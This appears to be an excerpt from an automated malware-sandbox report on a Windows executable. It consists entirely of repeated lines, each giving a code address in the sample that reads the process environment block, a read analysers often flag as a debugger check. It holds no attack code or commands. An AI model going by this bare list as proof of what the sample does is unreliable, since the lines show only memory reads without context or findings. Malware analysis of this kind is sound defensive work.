Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B351BE mov eax, dword ptr fs:[00000030h] 1_2_00B351BE
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B351BE mov eax, dword ptr fs:[00000030h] 1_2_00B351BE
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE61A0 mov eax, dword ptr fs:[00000030h] 1_2_00AE61A0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE61A0 mov eax, dword ptr fs:[00000030h] 1_2_00AE61A0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B749A4 mov eax, dword ptr fs:[00000030h] 1_2_00B749A4
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B749A4 mov eax, dword ptr fs:[00000030h] 1_2_00B749A4
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B749A4 mov eax, dword ptr fs:[00000030h] 1_2_00B749A4
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B749A4 mov eax, dword ptr fs:[00000030h] 1_2_00B749A4
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B369A6 mov eax, dword ptr fs:[00000030h] 1_2_00B369A6
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AEA185 mov eax, dword ptr fs:[00000030h] 1_2_00AEA185
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ADC182 mov eax, dword ptr fs:[00000030h] 1_2_00ADC182
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE2990 mov eax, dword ptr fs:[00000030h] 1_2_00AE2990
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABB1E1 mov eax, dword ptr fs:[00000030h] 1_2_00ABB1E1
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABB1E1 mov eax, dword ptr fs:[00000030h] 1_2_00ABB1E1
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABB1E1 mov eax, dword ptr fs:[00000030h] 1_2_00ABB1E1
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B441E8 mov eax, dword ptr fs:[00000030h] 1_2_00B441E8
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AD4120 mov eax, dword ptr fs:[00000030h] 1_2_00AD4120
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AD4120 mov eax, dword ptr fs:[00000030h] 1_2_00AD4120
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AD4120 mov eax, dword ptr fs:[00000030h] 1_2_00AD4120
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AD4120 mov eax, dword ptr fs:[00000030h] 1_2_00AD4120
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AD4120 mov ecx, dword ptr fs:[00000030h] 1_2_00AD4120
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE513A mov eax, dword ptr fs:[00000030h] 1_2_00AE513A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE513A mov eax, dword ptr fs:[00000030h] 1_2_00AE513A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB9100 mov eax, dword ptr fs:[00000030h] 1_2_00AB9100
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB9100 mov eax, dword ptr fs:[00000030h] 1_2_00AB9100
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB9100 mov eax, dword ptr fs:[00000030h] 1_2_00AB9100
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABC962 mov eax, dword ptr fs:[00000030h] 1_2_00ABC962
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABB171 mov eax, dword ptr fs:[00000030h] 1_2_00ABB171
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABB171 mov eax, dword ptr fs:[00000030h] 1_2_00ABB171
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ADB944 mov eax, dword ptr fs:[00000030h] 1_2_00ADB944
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ADB944 mov eax, dword ptr fs:[00000030h] 1_2_00ADB944
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB52A5 mov eax, dword ptr fs:[00000030h] 1_2_00AB52A5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB52A5 mov eax, dword ptr fs:[00000030h] 1_2_00AB52A5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB52A5 mov eax, dword ptr fs:[00000030h] 1_2_00AB52A5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB52A5 mov eax, dword ptr fs:[00000030h] 1_2_00AB52A5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB52A5 mov eax, dword ptr fs:[00000030h] 1_2_00AB52A5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ACAAB0 mov eax, dword ptr fs:[00000030h] 1_2_00ACAAB0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ACAAB0 mov eax, dword ptr fs:[00000030h] 1_2_00ACAAB0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AEFAB0 mov eax, dword ptr fs:[00000030h] 1_2_00AEFAB0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AED294 mov eax, dword ptr fs:[00000030h] 1_2_00AED294
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AED294 mov eax, dword ptr fs:[00000030h] 1_2_00AED294
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE2AE4 mov eax, dword ptr fs:[00000030h] 1_2_00AE2AE4
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE2ACB mov eax, dword ptr fs:[00000030h] 1_2_00AE2ACB
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF4A2C mov eax, dword ptr fs:[00000030h] 1_2_00AF4A2C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF4A2C mov eax, dword ptr fs:[00000030h] 1_2_00AF4A2C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7AA16 mov eax, dword ptr fs:[00000030h] 1_2_00B7AA16
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7AA16 mov eax, dword ptr fs:[00000030h] 1_2_00B7AA16
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC8A0A mov eax, dword ptr fs:[00000030h] 1_2_00AC8A0A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AD3A1C mov eax, dword ptr fs:[00000030h] 1_2_00AD3A1C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB5210 mov eax, dword ptr fs:[00000030h] 1_2_00AB5210
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB5210 mov ecx, dword ptr fs:[00000030h] 1_2_00AB5210
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB5210 mov eax, dword ptr fs:[00000030h] 1_2_00AB5210
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB5210 mov eax, dword ptr fs:[00000030h] 1_2_00AB5210
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABAA16 mov eax, dword ptr fs:[00000030h] 1_2_00ABAA16
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABAA16 mov eax, dword ptr fs:[00000030h] 1_2_00ABAA16
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF927A mov eax, dword ptr fs:[00000030h] 1_2_00AF927A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B6B260 mov eax, dword ptr fs:[00000030h] 1_2_00B6B260
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B6B260 mov eax, dword ptr fs:[00000030h] 1_2_00B6B260
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B88A62 mov eax, dword ptr fs:[00000030h] 1_2_00B88A62
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7EA55 mov eax, dword ptr fs:[00000030h] 1_2_00B7EA55
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B44257 mov eax, dword ptr fs:[00000030h] 1_2_00B44257
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB9240 mov eax, dword ptr fs:[00000030h] 1_2_00AB9240
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB9240 mov eax, dword ptr fs:[00000030h] 1_2_00AB9240
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB9240 mov eax, dword ptr fs:[00000030h] 1_2_00AB9240
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB9240 mov eax, dword ptr fs:[00000030h] 1_2_00AB9240
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE4BAD mov eax, dword ptr fs:[00000030h] 1_2_00AE4BAD
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE4BAD mov eax, dword ptr fs:[00000030h] 1_2_00AE4BAD
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE4BAD mov eax, dword ptr fs:[00000030h] 1_2_00AE4BAD
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B85BA5 mov eax, dword ptr fs:[00000030h] 1_2_00B85BA5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC1B8F mov eax, dword ptr fs:[00000030h] 1_2_00AC1B8F
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC1B8F mov eax, dword ptr fs:[00000030h] 1_2_00AC1B8F
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B6D380 mov ecx, dword ptr fs:[00000030h] 1_2_00B6D380
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE2397 mov eax, dword ptr fs:[00000030h] 1_2_00AE2397
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7138A mov eax, dword ptr fs:[00000030h] 1_2_00B7138A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AEB390 mov eax, dword ptr fs:[00000030h] 1_2_00AEB390
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ADDBE9 mov eax, dword ptr fs:[00000030h] 1_2_00ADDBE9
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE03E2 mov eax, dword ptr fs:[00000030h] 1_2_00AE03E2
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE03E2 mov eax, dword ptr fs:[00000030h] 1_2_00AE03E2
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE03E2 mov eax, dword ptr fs:[00000030h] 1_2_00AE03E2
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE03E2 mov eax, dword ptr fs:[00000030h] 1_2_00AE03E2
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE03E2 mov eax, dword ptr fs:[00000030h] 1_2_00AE03E2
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE03E2 mov eax, dword ptr fs:[00000030h] 1_2_00AE03E2
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B353CA mov eax, dword ptr fs:[00000030h] 1_2_00B353CA
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B353CA mov eax, dword ptr fs:[00000030h] 1_2_00B353CA
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7131B mov eax, dword ptr fs:[00000030h] 1_2_00B7131B
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABDB60 mov ecx, dword ptr fs:[00000030h] 1_2_00ABDB60
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE3B7A mov eax, dword ptr fs:[00000030h] 1_2_00AE3B7A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE3B7A mov eax, dword ptr fs:[00000030h] 1_2_00AE3B7A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B88B58 mov eax, dword ptr fs:[00000030h] 1_2_00B88B58
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABDB40 mov eax, dword ptr fs:[00000030h] 1_2_00ABDB40
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABF358 mov eax, dword ptr fs:[00000030h] 1_2_00ABF358
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC849B mov eax, dword ptr fs:[00000030h] 1_2_00AC849B
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B36CF0 mov eax, dword ptr fs:[00000030h] 1_2_00B36CF0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B36CF0 mov eax, dword ptr fs:[00000030h] 1_2_00B36CF0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B36CF0 mov eax, dword ptr fs:[00000030h] 1_2_00B36CF0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B714FB mov eax, dword ptr fs:[00000030h] 1_2_00B714FB
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B88CD6 mov eax, dword ptr fs:[00000030h] 1_2_00B88CD6
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AEBC2C mov eax, dword ptr fs:[00000030h] 1_2_00AEBC2C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B8740D mov eax, dword ptr fs:[00000030h] 1_2_00B8740D
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B8740D mov eax, dword ptr fs:[00000030h] 1_2_00B8740D
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B8740D mov eax, dword ptr fs:[00000030h] 1_2_00B8740D
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B36C0A mov eax, dword ptr fs:[00000030h] 1_2_00B36C0A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B36C0A mov eax, dword ptr fs:[00000030h] 1_2_00B36C0A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B36C0A mov eax, dword ptr fs:[00000030h] 1_2_00B36C0A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B36C0A mov eax, dword ptr fs:[00000030h] 1_2_00B36C0A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AD746D mov eax, dword ptr fs:[00000030h] 1_2_00AD746D
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B4C450 mov eax, dword ptr fs:[00000030h] 1_2_00B4C450
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B4C450 mov eax, dword ptr fs:[00000030h] 1_2_00B4C450
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AEA44B mov eax, dword ptr fs:[00000030h] 1_2_00AEA44B
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE35A1 mov eax, dword ptr fs:[00000030h] 1_2_00AE35A1
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B805AC mov eax, dword ptr fs:[00000030h] 1_2_00B805AC
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B805AC mov eax, dword ptr fs:[00000030h] 1_2_00B805AC
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE1DB5 mov eax, dword ptr fs:[00000030h] 1_2_00AE1DB5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE1DB5 mov eax, dword ptr fs:[00000030h] 1_2_00AE1DB5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE1DB5 mov eax, dword ptr fs:[00000030h] 1_2_00AE1DB5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB2D8A mov eax, dword ptr fs:[00000030h] 1_2_00AB2D8A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB2D8A mov eax, dword ptr fs:[00000030h] 1_2_00AB2D8A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB2D8A mov eax, dword ptr fs:[00000030h] 1_2_00AB2D8A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB2D8A mov eax, dword ptr fs:[00000030h] 1_2_00AB2D8A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB2D8A mov eax, dword ptr fs:[00000030h] 1_2_00AB2D8A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE2581 mov eax, dword ptr fs:[00000030h] 1_2_00AE2581
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE2581 mov eax, dword ptr fs:[00000030h] 1_2_00AE2581
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE2581 mov eax, dword ptr fs:[00000030h] 1_2_00AE2581
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE2581 mov eax, dword ptr fs:[00000030h] 1_2_00AE2581
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AEFD9B mov eax, dword ptr fs:[00000030h] 1_2_00AEFD9B
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AEFD9B mov eax, dword ptr fs:[00000030h] 1_2_00AEFD9B
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B68DF1 mov eax, dword ptr fs:[00000030h] 1_2_00B68DF1
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ACD5E0 mov eax, dword ptr fs:[00000030h] 1_2_00ACD5E0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ACD5E0 mov eax, dword ptr fs:[00000030h] 1_2_00ACD5E0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7FDE2 mov eax, dword ptr fs:[00000030h] 1_2_00B7FDE2
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7FDE2 mov eax, dword ptr fs:[00000030h] 1_2_00B7FDE2
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7FDE2 mov eax, dword ptr fs:[00000030h] 1_2_00B7FDE2
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7FDE2 mov eax, dword ptr fs:[00000030h] 1_2_00B7FDE2
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B36DC9 mov eax, dword ptr fs:[00000030h] 1_2_00B36DC9
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B36DC9 mov eax, dword ptr fs:[00000030h] 1_2_00B36DC9
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B36DC9 mov eax, dword ptr fs:[00000030h] 1_2_00B36DC9
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B36DC9 mov ecx, dword ptr fs:[00000030h] 1_2_00B36DC9
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B36DC9 mov eax, dword ptr fs:[00000030h] 1_2_00B36DC9
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B36DC9 mov eax, dword ptr fs:[00000030h] 1_2_00B36DC9
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B3A537 mov eax, dword ptr fs:[00000030h] 1_2_00B3A537
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B88D34 mov eax, dword ptr fs:[00000030h] 1_2_00B88D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7E539 mov eax, dword ptr fs:[00000030h] 1_2_00B7E539
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE4D3B mov eax, dword ptr fs:[00000030h] 1_2_00AE4D3B
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE4D3B mov eax, dword ptr fs:[00000030h] 1_2_00AE4D3B
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE4D3B mov eax, dword ptr fs:[00000030h] 1_2_00AE4D3B
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC3D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC3D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC3D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC3D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC3D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC3D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC3D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC3D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC3D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC3D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC3D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC3D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC3D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABAD30 mov eax, dword ptr fs:[00000030h] 1_2_00ABAD30
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ADC577 mov eax, dword ptr fs:[00000030h] 1_2_00ADC577
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ADC577 mov eax, dword ptr fs:[00000030h] 1_2_00ADC577
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF3D43 mov eax, dword ptr fs:[00000030h] 1_2_00AF3D43
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B33540 mov eax, dword ptr fs:[00000030h] 1_2_00B33540
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B63D40 mov eax, dword ptr fs:[00000030h] 1_2_00B63D40
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AD7D50 mov eax, dword ptr fs:[00000030h] 1_2_00AD7D50
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B346A7 mov eax, dword ptr fs:[00000030h] 1_2_00B346A7
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B80EA5 mov eax, dword ptr fs:[00000030h] 1_2_00B80EA5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B80EA5 mov eax, dword ptr fs:[00000030h] 1_2_00B80EA5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B80EA5 mov eax, dword ptr fs:[00000030h] 1_2_00B80EA5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B4FE87 mov eax, dword ptr fs:[00000030h] 1_2_00B4FE87
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE16E0 mov ecx, dword ptr fs:[00000030h] 1_2_00AE16E0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC76E2 mov eax, dword ptr fs:[00000030h] 1_2_00AC76E2
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE36CC mov eax, dword ptr fs:[00000030h] 1_2_00AE36CC
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF8EC7 mov eax, dword ptr fs:[00000030h] 1_2_00AF8EC7
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B88ED6 mov eax, dword ptr fs:[00000030h] 1_2_00B88ED6
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B6FEC0 mov eax, dword ptr fs:[00000030h] 1_2_00B6FEC0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B6FE3F mov eax, dword ptr fs:[00000030h] 1_2_00B6FE3F
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABE620 mov eax, dword ptr fs:[00000030h] 1_2_00ABE620
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABC600 mov eax, dword ptr fs:[00000030h] 1_2_00ABC600
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABC600 mov eax, dword ptr fs:[00000030h] 1_2_00ABC600
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABC600 mov eax, dword ptr fs:[00000030h] 1_2_00ABC600
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE8E00 mov eax, dword ptr fs:[00000030h] 1_2_00AE8E00
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AEA61C mov eax, dword ptr fs:[00000030h] 1_2_00AEA61C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AEA61C mov eax, dword ptr fs:[00000030h] 1_2_00AEA61C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71608 mov eax, dword ptr fs:[00000030h] 1_2_00B71608
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC766D mov eax, dword ptr fs:[00000030h] 1_2_00AC766D
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ADAE73 mov eax, dword ptr fs:[00000030h] 1_2_00ADAE73
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ADAE73 mov eax, dword ptr fs:[00000030h] 1_2_00ADAE73
